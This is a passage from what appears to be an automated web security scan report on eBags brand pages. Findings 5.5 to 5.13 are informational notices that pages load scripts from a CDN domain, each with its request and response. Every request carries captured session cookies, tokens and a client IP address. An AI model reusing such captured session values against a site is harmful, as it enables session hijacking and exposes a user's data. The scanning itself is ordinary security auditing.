Content-Type: text/html; charset=UTF-8
Content-Length: 106082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.5. http://www.ebags.com/brand/eagle-creek  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/eagle-creek

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/eagle-creek HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:12:41 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:12:41 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 122990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.6. http://www.ebags.com/brand/fleurville  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/fleurville

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/fleurville HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 62446


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.7. http://www.ebags.com/brand/hobo-international  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/hobo-international

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/hobo-international HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 52206


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.8. http://www.ebags.com/brand/hurley  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/hurley

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/hurley HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 83654


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.9. http://www.ebags.com/brand/ju-ju-be  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/ju-ju-be

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/ju-ju-be HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:44 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:44 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 68446


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.10. http://www.ebags.com/brand/kalencom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/kalencom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/kalencom HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:21 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:21 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 103272


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.11. http://www.ebags.com/brand/lego  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/lego

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/lego HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:14:40 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:14:40 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 64901


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.12. http://www.ebags.com/brand/lodis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/lodis

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/lodis HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 112597


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.13. http://www.ebags.com/brand/michael-michael-kors-watches  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ebags.com
Path:   /brand/michael-michael-kors-watches

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /brand/michael-michael-kors-watches HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:26 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:26 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>


<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
